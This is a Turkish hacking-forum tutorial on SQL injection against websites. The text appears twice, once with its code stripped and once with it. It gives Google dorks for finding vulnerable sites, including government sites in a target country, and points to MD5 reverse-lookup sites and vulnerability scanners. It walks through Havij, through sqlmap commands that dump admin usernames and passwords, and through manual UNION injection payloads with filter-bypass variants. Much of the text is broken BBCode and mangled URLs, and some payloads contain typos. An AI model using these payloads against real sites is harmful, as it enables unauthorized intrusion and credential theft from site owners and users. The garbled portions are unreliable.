Evet Arkadaşlar SQL Açığı ve Türleri Tüm Yöntemler Konuma Hoşgelidiniz !
------------------------------------------------------
04 MART 2016 CUMA
#DUYURU KONUNUN DÜZGÜN HALİ BU LİNK'DEDİR.
http://www.turkhackteam.org/web-ser...igi-en-temelden-tum-yontemlerine-aquiell.html
#DUYURU KONUNUN DÜZGÜN HALİ BU LİNK'DEDİR.
http://www.turkhackteam.org/web-ser...igi-en-temelden-tum-yontemlerine-aquiell.html
#DUYURU KONUNUN DÜZGÜN HALİ BU LİNK'DEDİR.
http://www.turkhackteam.org/web-ser...igi-en-temelden-tum-yontemlerine-aquiell.html
------------------------------------------------------ ---------------------------------------------------------------------
DERS 1 SQL Hakkında Kısa Bilgiler
+SQL Nedir ?
+Veri Tabanından Bilgi Çekme Silme Vb. İşlemler İçin Kullanılır
+İnternet Sitelerinde Çokca Bulunan Bir Açıktır.
+KRİTİK BİR AÇIKITR !
+SQL Açığı Nedir ?
-SQL Açığı Veritabanındaki Zafiyetlerden Oluşur.
+SQL Açıklı Siteleri Nasıl Bulurum ?
+Gerekli Dorkarı Yazarak
+SQL 'De Hedef Ülke İçin Dork Nasıl Yazılır ?
-
+SQL Dork Yazdım Siteyi Buldum Açık Olduğunu Nasıl Anlarım ?
ÖRN:www.örneksitemiz.com/newsDetail.php?id=12
>>
id=12'
>>
id=12'nin Yanına tek tırnak (') Koyuyoruz.
---------------------------------------------------------------------
DERS 2 MD5 ÇÖZME
Arkadaşlar MD5 Kırma Diye Birşey Günümüzde Bulunmamaktadır.
MD5'i Çözülenler Google Databasesinde Mevcuttur.
Bazı Siteler Çözülmüş MD5LERİ Bulmamızda Yardımcı Oluyor.
ÖRN :
---------------------------------------------------------------------
Ders 3 Admin Panel Bulma
1-)İntelli Tamper :
Sitenin Dosyalarını Çekip Admin Panelini Bulabilirsiniz.
2-)Havij:
Haviji İndirip Menülerden " Admin Panel Finder " Basıp Admin Panelini Bulabilirsiniz .
3-)Robots.txt ; ve Sitemap ;
---------------------------------------------------------------------
DERS 4 HEDEF SİTEDE SQL AÇIK TARAYICI PROGRAMLAR
1-)Safe 3 :
www.hedefsitemiz.com/ Şeklinde Yazıp " Scan" Butonuna Basıyoruz .
-Eğer Açık Var İse "Vulnerablinies" Bölümünde çıkacaktır.
-Açık Çıktıysa Sağ Tıklayıp " Export " Diyoruz .
- Ve Bizi Açığa Yönlendiriyor.
2-)Acunetix :
Sol Üst Köşede " New Scan " Basıyoruz.
-Karşımıza Çıkan Pencere'de Hedef Sitemizin Başına "http://www." Koyarak Yazıyoruz .
-Next ... Next Diyoruz
-VE Finish Geliyor Finish Deyip Açık Taramasını Bekliyoruz.
-Kritik Açık Olduğunu Kırmızı Renkteki Açıklar Belitiyor. İşimize Yarayan O'dur.
3-)WebCruiserWWS :
-Web Cruiser Programı xss , lfi , sql , rfi açıkları tarayabilir.
-scanner deyip hedef sitemizi yazıp " scan site " dediktan sonra tarama başlar.
---------------------------------------------------------------------
Ders 5 Havij İle Site Hackleme
---------------------------------------------------------------------
DERS 6 SQLMAP İLE SİTE HACK
Gerekli Programlar :
+SQLMAP
+Phyton 2.7
Yükledikten Sonra :
+SQLMAP'I C:// Dizisine Atın.
+İlk Olarak CMD açın ve ;
+Devam Ediyoruz.
+Bir Değişiklik Yapıyoruz.
+SQLMAP yoluna geldik şimdi
+Şimdi Bize [Y/n] Sorusu Soracak Y Deyip Devam Ediyoruz
+Tabloları Çekelim
+Düzenlersek
+Düzenlersek
ADMİN Kolonları İçindeki Tabloları Bulduk Varsayarsak
+----------+--------------+
| Column | Type |
+----------+--------------+
| Password | varchar(100) |
| Username | varchar(100) |
Bunlar geldi varsayalım..
+Şifre Bulmak İçin.
+Kullanıcı Adı İçin.
---------------------------------------------------------------------
Ders 7 Manuel SQL Hack
Saldırı Aşamaları :
İki Türlü Saldırı Yapılabilir Havij ve Manuel .
İlk Olarak Manuel İle Saldıralım.
1-)İlk Önce Sitenin Kolon Sayısını Öğreneceğiz .
2-)Kolonları Yansıtacağız.
3-)Tablo İsimlerini Çekeceğiz.
4-)Tablolardan İstediğmizi Alacağız ( Şifre - Email - Kullanıcı Adı)
Ve Saldırıyoruz ...
1-)Kolon Sayısını Öğrenme :
Site:örneksitemiz.com/index.php?id=30
Arkadaşlar Sitemizin Sonuna (order+by+sayı- ) ( - işaretini getirmeyi unutmayalım)
Eğer Şöyle Bir Hata Gelirse :
Hata: Unknown column 10 in order clause Benzer Bir Hata Çıkarsa ;
>> Kolon Sayısı 29'dan Küçük Tek Tek Aşağı İniyoruz .
>>order+by+28- , order+by+27-, order+by+26 , Site Eski Haline Gelesiye Kadar İniyoruz .
>> order+by+25- ( Sayfa Burda Eski Haline Gelmiş İse KOLON SAYIMIZ 25'Dir . )
2-)Kolonları Yansıtma
Arkadaşlar Burda +union+select+kolon Teker Teker Yazıyoruz. (- Sitenin Sonuna Yine Eklenecektir.)
>>
>>
Şeklinde Olucak Kolon Sayımız Kaçsa Oraya Kadar Yazacağız.
>>
Şimdi Ekranı Sayılar Yansıyacak 10 ve 13 Yansıdı Diyelim. Bu Sayılardan Birini Seçip İşlemimize Devam Edeceğiz.Eğer Sayılar Yansımazsa Bypass Gerekecek.
>>Bypass
3-)Tablo İsimlerini Çekmek
-Yansıyan Sayıları ( 10 ve 13) Birini Seçiyoruz .
-10 Seçelim.
Bu Komut Sayesinde Sitenin VeriTabanı İsmini Öğreniyoruz.
Bu Komut Sayesinde Sitenin VeriTabanı Versiyonunu Öğreniyoruz.
[/B][/COLOR][/SIZE][/COLOR][/SIZE][/COLOR][/SIZE][/COLOR][/COLOR][/SIZE][/B][/COLOR]
Bu kod sayesinde sadece hedef sitenin tablo isimlerini öğreniriz. Şimdi bu kodu gönderelim, gönderdikten sonra sitenin tablo isimleri ekrana yansıyacaktır. Örneğin yansıyan isimleri aşağıya yazalım.
Tablo İsimleri: admin,yerler,etkinlikler,yaptıklarımız
Bizim burada ilgileneceğimiz tablo ismi admin dir.
4-)Tablo İsimlerinden Veriyi Almak
-Adminin Verilerini Alacağız.
Bu Kodu Gönderdikten Sonra Admin İçindeki Sütunlar Gelecektir. Gelen Sutünlar
ÖRN : user
passaword
e-mail
phone number
Bize Lazım Olanlar " User ve Passaword "
>>
Şimdi Bize Lazım Olan Passaword ve User Sütunlarını Alalım
>>
Kodunu Yazıp Sayfayı Yeniliyoruz.
>>
Ve Ekrana User ve Passaword Bilgileri Yansıyacaktır.
>>
Bilgileri Aldık Şimdi ( Admin Panelini ) Bulmamız Gerekecektir. (İntelli Tamper Programı Bu konuda İyidir)
------------------------------------------------------
04 MART 2016 CUMA
#DUYURU KONUNUN DÜZGÜN HALİ BU LİNK'DEDİR.
http://www.turkhackteam.org/web-ser...igi-en-temelden-tum-yontemlerine-aquiell.html
#DUYURU KONUNUN DÜZGÜN HALİ BU LİNK'DEDİR.
http://www.turkhackteam.org/web-ser...igi-en-temelden-tum-yontemlerine-aquiell.html
#DUYURU KONUNUN DÜZGÜN HALİ BU LİNK'DEDİR.
http://www.turkhackteam.org/web-ser...igi-en-temelden-tum-yontemlerine-aquiell.html
------------------------------------------------------ ---------------------------------------------------------------------
DERS 1 SQL Hakkında Kısa Bilgiler
+SQL Nedir ?
+Veri Tabanından Bilgi Çekme Silme Vb. İşlemler İçin Kullanılır
+İnternet Sitelerinde Çokca Bulunan Bir Açıktır.
+KRİTİK BİR AÇIKITR !
+SQL Açığı Nedir ?
-SQL Açığı Veritabanındaki Zafiyetlerden Oluşur.
+SQL Açıklı Siteleri Nasıl Bulurum ?
+Gerekli Dorkarı Yazarak
ÖRNEK :
Kod:
inurl:newsDetail.php?id=
inurl:gallery.php?id= i
nurl:article.php?id=
+SQL 'De Hedef Ülke İçin Dork Nasıl Yazılır ?
-
Kod:
inurl:php?id= gov.fr
+SQL Dork Yazdım Siteyi Buldum Açık Olduğunu Nasıl Anlarım ?
ÖRN:www.örneksitemiz.com/newsDetail.php?id=12
>>
id=12'
>>
id=12'nin Yanına tek tırnak (') Koyuyoruz.
Kod:
[COLOR=Orange][B][SIZE=2][COLOR=White][COLOR=Yellow][COLOR=SeaGreen][COLOR=SandyBrown][COLOR=SeaGreen][COLOR=DarkRed][COLOR=Teal][COLOR=DarkOrange][COLOR=SandyBrown][COLOR=Orange][COLOR=SandyBrown]i[COLOR=Gray]nclude(../inc/content220\\\\\\\\\\\\\\\\.inc.php) [function.include]: failed to open stream: No such file or directory in /homepages/6/d27097856/htdocs/www.fanatec.de/html/index.php on line 162[/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/SIZE][/B][/COLOR]
---------------------------------------------------------------------
DERS 2 MD5 ÇÖZME
Arkadaşlar MD5 Kırma Diye Birşey Günümüzde Bulunmamaktadır.
MD5'i Çözülenler Google Databasesinde Mevcuttur.
Bazı Siteler Çözülmüş MD5LERİ Bulmamızda Yardımcı Oluyor.
ÖRN :
Kod:
[LIST=1]
[*] [URL="https://tik.lat/CIu3L"] http://tr.freemd5.com[/URL]
[*] [URL="https://tik.lat/Q2Lfr"] â
Hash Toolkit - Reverse MD5 / SHA1 Hashes â
[/URL]
[*] [URL="https://tik.lat/4DdeY"] HashKiller.co.uk, Over 131.235 billion decrypted hashes in total, Free Hash Cracker, Online Hash Cracker[/URL]
[*] [URL="https://tik.lat/2QseI"] md5cracker.org | The Cracking Engine for MD5-Hashes[/URL]
[*] [URL="https://tik.lat/qal18"] MD5 Crack | A free online MD5 hash and password cracker and decrypter.[/URL]
[*] [URL="https://tik.lat/Sb5Hw"] md5 cracker - The fastest way to recover your lost passwords - Crack it[/URL]
[*] [URL="https://tik.lat/cOKVp"] online md5 cracker,md5 decoder, md5 decrypt[/URL]
[*] [URL="https://tik.lat/KvJIA"] MD5 Cracker - TobTu[/URL]
[*] [URL="https://tik.lat/0Li5l"] Cracker[/URL]
[*][URL]http://www.hash-cracker.com/[/URL]
[*] [URL="https://tik.lat/d2m1O"] MD5 Decrypter.com, MD5 Decryption, Free MD5 Decrypter, Security, MD5 Hash, MD5 Security.[/URL]
[*] [URL="https://tik.lat/Gueia"] md5,md5???,XMD5[/URL]
[*] [URL="https://tik.lat/Ta3eQ"] hash-database.net[/URL]
[*] [URL="https://tik.lat/hUq8X"] md5-hash.com[/URL]
[/LIST]
Ders 3 Admin Panel Bulma
1-)İntelli Tamper :
Sitenin Dosyalarını Çekip Admin Panelini Bulabilirsiniz.
2-)Havij:
Haviji İndirip Menülerden " Admin Panel Finder " Basıp Admin Panelini Bulabilirsiniz .
3-)Robots.txt ; ve Sitemap ;
Sitemap= Bulundugunuz Sitenin Haritasını Gösterir Ki Admin Panelini Bulabilirsiniz
Robots.txt= İse Eger Ki Adminin Browser'ı Google İse Robots.txt Site'deki Bi Nevi Kayıt Yapan Google
Robotudur(Script Kaydı ) Bunuda txt Belgesi Olarak sİtede Görüntüleyebilirsiniz.
+Robots.txt ve sitemap ; nasıl uygularım ?
-www.siteadresi.com/sitemap.xml&&
yada
-www.siteadresi.com/robots.tx
+Robots.txt ve sitemap ; nasıl uygularım ?
-www.siteadresi.com/sitemap.xml&&
yada
-www.siteadresi.com/robots.tx
---------------------------------------------------------------------
DERS 4 HEDEF SİTEDE SQL AÇIK TARAYICI PROGRAMLAR
1-)Safe 3 :
www.hedefsitemiz.com/ Şeklinde Yazıp " Scan" Butonuna Basıyoruz .
-Eğer Açık Var İse "Vulnerablinies" Bölümünde çıkacaktır.
-Açık Çıktıysa Sağ Tıklayıp " Export " Diyoruz .
- Ve Bizi Açığa Yönlendiriyor.
![mzLa52.png](http://i.hizliresim.com/mzLa52.png)
2-)Acunetix :
Sol Üst Köşede " New Scan " Basıyoruz.
-Karşımıza Çıkan Pencere'de Hedef Sitemizin Başına "http://www." Koyarak Yazıyoruz .
-Next ... Next Diyoruz
-VE Finish Geliyor Finish Deyip Açık Taramasını Bekliyoruz.
-Kritik Açık Olduğunu Kırmızı Renkteki Açıklar Belitiyor. İşimize Yarayan O'dur.
![DRJr9y.jpg](http://i.hizliresim.com/DRJr9y.jpg)
3-)WebCruiserWWS :
-Web Cruiser Programı xss , lfi , sql , rfi açıkları tarayabilir.
-scanner deyip hedef sitemizi yazıp " scan site " dediktan sonra tarama başlar.
![EqJBpD.png](http://i.hizliresim.com/EqJBpD.png)
---------------------------------------------------------------------
Ders 5 Havij İle Site Hackleme
+HAVİJ AÇIYORUZ TARGET YAZAN YERE SİTE ADRESİMİZİ YAZIYORUZ.
![hvj1.png](http://www.hizliresimyukle.com/images/2015/08/12/hvj1.png)
+Sitemizi Yazdıktan Sonra " Analyze " Tuşuna Basıyoruz.
![hvj2.png](http://www.hizliresimyukle.com/images/2015/08/12/hvj2.png)
+Bekliyoruz...
![hvj3.png](http://www.hizliresimyukle.com/images/2015/08/12/hvj3.png)
+Tables Diyoruz ve Databasemizi Seçiyoruz.
![hvj4.png](http://www.hizliresimyukle.com/images/2015/08/12/hvj4.png)
+Databesemizi Seçtikten Sonra " Tables >> Get Tables " Diyoruz.
![hvj5.png](http://www.hizliresimyukle.com/images/2015/08/12/hvj5.png)
+Bilgilerimiz Geliyor...
![hvj6.png](http://www.hizliresimyukle.com/images/2015/08/12/hvj6.png)
+Gelen Bilgilerden " USER " Seçiyoruz.
![hvj7.png](http://www.hizliresimyukle.com/images/2015/08/12/hvj7.png)
+User Seçtikten Sonra >> " get columns " diyoruz.
![hvj8.png](http://www.hizliresimyukle.com/images/2015/08/12/hvj8.png)
+Yeni Bilgiler Geliyor Bize Lazım Olan " ADMİN(username) VE PASSWORD " SEÇİYORUZ.
![hvj9.png](http://www.hizliresimyukle.com/images/2015/08/12/hvj9.png)
+ADMİN(USERNAME) VE PASSWORD SEÇTİKTEN SONRA >> " GET DATA " DİYORUZ.
![hvj10.png](http://www.hizliresimyukle.com/images/2015/08/12/hvj10.png)
+Ve İstediğimiz Bilgiler Çekiliyor ..
![hvj11.png](http://www.hizliresimyukle.com/images/2015/08/12/hvj11.png)
---------------------------------------------------------------------
DERS 6 SQLMAP İLE SİTE HACK
Gerekli Programlar :
+SQLMAP
+Phyton 2.7
Yükledikten Sonra :
+SQLMAP'I C:// Dizisine Atın.
+İlk Olarak CMD açın ve ;
Kod:
cd..
Kod:
cd..
Kod:
cd sqlmap
Kod:
sqlmap.py -u''http://site.com/php?id=1'' --dbs
+Tabloları Çekelim
Kod:
sqlmap.py -u''http://site.com/php?id=1'' veritabanı ismi --tables
+Düzenlersek
Kod:
sqlmap.py -u''http://site.com/php?id=1'' türkhack--tables
Kod:
sqlmap.py -u''http://site.com/php?id=1'' türkhack -T tablo_ismi --columns
+Düzenlersek
Kod:
sqlmap.py -u''http://site.com/php?id=1'' türkhack -T admin --columns
ADMİN Kolonları İçindeki Tabloları Bulduk Varsayarsak
+----------+--------------+
| Column | Type |
+----------+--------------+
| Password | varchar(100) |
| Username | varchar(100) |
Bunlar geldi varsayalım..
+Şifre Bulmak İçin.
Kod:
sqlmap.py -u''http://site.com/php?id=1'' türkhack-T admin -C Password --dump
+Kullanıcı Adı İçin.
Kod:
sqlmap.py -u''http://site.com/php?id=1'' türkhack-T admin -C Username --dump
---------------------------------------------------------------------
Ders 7 Manuel SQL Hack
Saldırı Aşamaları :
İki Türlü Saldırı Yapılabilir Havij ve Manuel .
İlk Olarak Manuel İle Saldıralım.
1-)İlk Önce Sitenin Kolon Sayısını Öğreneceğiz .
2-)Kolonları Yansıtacağız.
3-)Tablo İsimlerini Çekeceğiz.
4-)Tablolardan İstediğmizi Alacağız ( Şifre - Email - Kullanıcı Adı)
Ve Saldırıyoruz ...
1-)Kolon Sayısını Öğrenme :
Site:örneksitemiz.com/index.php?id=30
Arkadaşlar Sitemizin Sonuna (order+by+sayı- ) ( - işaretini getirmeyi unutmayalım)
Kod:
>> örneksitemiz.com/index.php?id=30+order+by+29-
Eğer Şöyle Bir Hata Gelirse :
Hata: Unknown column 10 in order clause Benzer Bir Hata Çıkarsa ;
>> Kolon Sayısı 29'dan Küçük Tek Tek Aşağı İniyoruz .
>>order+by+28- , order+by+27-, order+by+26 , Site Eski Haline Gelesiye Kadar İniyoruz .
>> order+by+25- ( Sayfa Burda Eski Haline Gelmiş İse KOLON SAYIMIZ 25'Dir . )
2-)Kolonları Yansıtma
Arkadaşlar Burda +union+select+kolon Teker Teker Yazıyoruz. (- Sitenin Sonuna Yine Eklenecektir.)
>>
Kod:
http://www.%C3%B6rneksitemiz.com/index.php?id=30www.örneksitemiz.com/index.php?id=30[/URL] URL Sonuna
>>
Kod:
www.örneksitemiz.com/index.php?id=30+union+select+1+2+3+4+5+...23+24+25-
Şeklinde Olucak Kolon Sayımız Kaçsa Oraya Kadar Yazacağız.
>>
Şimdi Ekranı Sayılar Yansıyacak 10 ve 13 Yansıdı Diyelim. Bu Sayılardan Birini Seçip İşlemimize Devam Edeceğiz.Eğer Sayılar Yansımazsa Bypass Gerekecek.
>>Bypass
Kod:
1) Normal: +union +select+1,2,3,4,5,6,7,25
Bypass: +/*!union*/+/*!select*/+1,2,3,4,5,6,7,25
2) Normal:+union +select+1,2,3,4,5,6,7,25
Bypass: +union +(select+1,2,3,4,5,6,7,25)
3) Normal:+union +select+1,2,3,4,5,6,7,25
Bypass: +#union# +#select#+1,2,3,4,5,6,7,25
3-)Tablo İsimlerini Çekmek
-Yansıyan Sayıları ( 10 ve 13) Birini Seçiyoruz .
-10 Seçelim.
Kod:
A-)www.örneksitemiz.com/index.php?id=30+union+select+1,2,database(),3,4,5, 6,7,8,..,24,25-
Bu Komut Sayesinde Sitenin VeriTabanı İsmini Öğreniyoruz.
Kod:
B-)www.örneksitemiz.com/index.php?id=30+union+select+1,2,version(),3,4,5,6 ,7,8,..,24,25-
Bu Komut Sayesinde Sitenin VeriTabanı Versiyonunu Öğreniyoruz.
Kod:
C-)www.örneksitemiz.com/index.php?id=30+union+select+1,2,group_contact(tab le_name),4,5,6,7,8,...,24,25+from+information_schema.tables-
[COLOR=Orange][B][SIZE=2][COLOR=White][COLOR=Yellow][SIZE=3][COLOR=white][SIZE=3][COLOR=white]
[SIZE=2][COLOR=SandyBrown][B] information_schema.tables = veritabanındaki tablo isimlerini gösterir
>>schema.tables yerini daha sonra şu komutu yazıyoruz.
[/B][B] information_schema.columns = veritabanındaki kolon isimlerini gösterir
[CODE]-)http://www.%C3%B6rneksitemiz/index.php?id=30+union+selectwww.örneksitemiz/index.php?id=30+union+select[/URL]+1,2,group_concat(table_name),4,5,...,24,25+from+i nformation_schema.tables+where+tables_schema=database()
Bu kod sayesinde sadece hedef sitenin tablo isimlerini öğreniriz. Şimdi bu kodu gönderelim, gönderdikten sonra sitenin tablo isimleri ekrana yansıyacaktır. Örneğin yansıyan isimleri aşağıya yazalım.
Tablo İsimleri: admin,yerler,etkinlikler,yaptıklarımız
Bizim burada ilgileneceğimiz tablo ismi admin dir.
4-)Tablo İsimlerinden Veriyi Almak
-Adminin Verilerini Alacağız.
Kod:
www.örneksitemiz.com/index.php?id=30+union+select+1,2,group_concat(CoLumn_Name),4,5,6,7,8+fr om+information_schema.CoLumns+where+TabLeS_schema= database()+and+TabLe_Name=admin
Bu Kodu Gönderdikten Sonra Admin İçindeki Sütunlar Gelecektir. Gelen Sutünlar
ÖRN : user
passaword
phone number
Bize Lazım Olanlar " User ve Passaword "
>>
Şimdi Bize Lazım Olan Passaword ve User Sütunlarını Alalım
>>
Kod:
www.örneksite.com/index.php?id=30+union+select+1,2,group_concat(user,password),4,5,6,7,8+ from+admin
Kodunu Yazıp Sayfayı Yeniliyoruz.
>>
Ve Ekrana User ve Passaword Bilgileri Yansıyacaktır.
>>
Bilgileri Aldık Şimdi ( Admin Panelini ) Bulmamız Gerekecektir. (İntelli Tamper Programı Bu konuda İyidir)
Son düzenleme: